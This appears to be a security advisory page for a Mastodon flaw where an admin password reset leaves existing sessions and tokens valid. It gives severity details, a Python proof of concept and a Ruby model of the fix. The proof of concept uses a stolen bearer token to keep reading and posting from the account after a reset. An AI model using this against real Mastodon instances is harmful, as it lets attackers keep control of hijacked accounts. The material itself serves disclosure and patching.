Security Vulnerability Report
CVE-2025-62174 CVSS 3.5 LOW

Published: 2025-10-13 21:15:35
Last Modified: 2025-10-20 17:20:09

Description

Mastodon is a free, open-source social network server based on ActivityPub. In Mastodon before 4.4.6, 4.3.14, and 4.2.27, when an administrator resets a user account's password via the command-line interface using `bin/tootctl accounts modify --reset-password`, active sessions and access tokens for that account are not revoked. This allows an attacker with access to a previously compromised session or token to continue using the account after the password has been reset. This issue has been patched in versions 4.2.27, 4.3.14, and 4.4.6. No known workarounds exist.

CVSS Details

CVSS Score: 3.5
Severity: LOW
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N
Attack Vector: Network; Attack Complexity: Low; Privileges Required: Low; User Interaction: Required; Scope: Unchanged; Confidentiality: Low; Integrity: None; Availability: None
Exploitability Score: 2.1; Impact Score: 1.4

Configurations (Affected Products)

cpe:2.3:a:joinmastodon:mastodon:*:*:*:*:*:*:*:* (Mastodon < 4.2.27) - VULNERABLE
cpe:2.3:a:joinmastodon:mastodon:*:*:*:*:*:*:*:* (Mastodon 4.3.x < 4.3.14) - VULNERABLE
cpe:2.3:a:joinmastodon:mastodon:*:*:*:*:*:*:*:* (Mastodon 4.4.x < 4.4.6) - VULNERABLE

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-62174 - Mastodon Password Reset Session Not Revoked PoC
# This PoC demonstrates the vulnerability where sessions/tokens are not revoked after password reset
import requests

# Step 1: Attacker obtains a valid session token or access token through prior compromise
# (e.g., phishing, XSS, or information disclosure)
ATTACKER_TOKEN = "attacker_obtained_access_token_xxxxx"
TARGET_INSTANCE = "https://mastodon.example.com"

# Step 2: Attacker verifies the token is still active
headers = {"Authorization": f"Bearer {ATTACKER_TOKEN}"}

# Verify account access before password reset
response = requests.get(f"{TARGET_INSTANCE}/api/v1/accounts/verify_credentials", headers=headers)
print(f"Before reset - Status: {response.status_code}")
print(f"Account: {response.json().get('username')}")

# Step 3: Admin resets the target user's password via CLI (vulnerable command)
# $ bin/tootctl accounts modify <username> --reset-password
# The password is reset, but sessions and tokens are NOT revoked

# Step 4: Attacker verifies the token is STILL valid after password reset
response_after = requests.get(f"{TARGET_INSTANCE}/api/v1/accounts/verify_credentials", headers=headers)
print(f"After reset - Status: {response_after.status_code}")  # Still 200 = VULNERABLE
print(f"Account: {response_after.json().get('username')}")  # Still accessible

# Step 5: Attacker can continue to perform actions using the old token
# e.g., post statuses, read DMs, follow/unfollow accounts, etc.
post_data = {"status": "Compromised account - attacker still has access!"}
response_post = requests.post(f"{TARGET_INSTANCE}/api/v1/statuses", headers=headers, json=post_data)
print(f"Malicious post status: {response_post.status_code}")  # Would succeed if vulnerable
```
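As an added illustration of the defect class (CWE-613) and its fix, and not Mastodon's own code or the actual patch: a simplified Ruby model of an account whose sessions and API tokens either survive a password reset (the vulnerable behaviour) or are revoked in the same operation (the hardened behaviour of the patched releases). The Account and Credential names and the SHA-256 stand-in for password hashing are assumptions.

```ruby
require "securerandom"
require "digest"

# Added, simplified model (not Mastodon's code; names are assumed) of an account
# whose sessions and API tokens outlive a password reset unless revoked explicitly.
Credential = Struct.new(:kind, :secret, :revoked)  # kind: :session or :token

class Account
  def initialize(username)
    @username = username
    @credentials = []
    set_password(SecureRandom.hex(12))
  end

  def set_password(plain)
    @password_digest = Digest::SHA256.hexdigest(plain) # stand-in for bcrypt
  end

  def authenticate(plain)
    @password_digest == Digest::SHA256.hexdigest(plain)
  end

  # Issued at login (:session) or by OAuth authorization (:token).
  def issue(kind)
    Credential.new(kind, SecureRandom.hex(16), false).tap { |c| @credentials << c }
  end

  # What a request handler checks: does this secret still map to a live credential?
  def valid?(secret)
    @credentials.any? { |c| c.secret == secret && !c.revoked }
  end

  # Vulnerable behaviour (CWE-613): the password changes, but every session and
  # token issued under the old credentials keeps working, as the PoC observes.
  def reset_password_vulnerable
    new_password = SecureRandom.hex(12)
    set_password(new_password)
    new_password
  end

  # Hardened behaviour, as in the patched releases: revoke all sessions and
  # access tokens in the same operation as the password change.
  def reset_password_hardened
    new_password = SecureRandom.hex(12)
    set_password(new_password)
    @credentials.each { |c| c.revoked = true }
    new_password
  end
end
```

The same distinction applies to any administrative reset path: a credential reset that leaves previously issued sessions and tokens valid does not evict an attacker who already holds one.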

References

CWE-613: Insufficient Session Expiration
https://github.com/mastodon/mastodon/commit/1631fb80e8029d2c5425a03a2297b93f7e225217 (Patch)
https://github.com/mastodon/mastodon/security/advisories/GHSA-f3q3-rmf7-9655 (Vendor Advisory)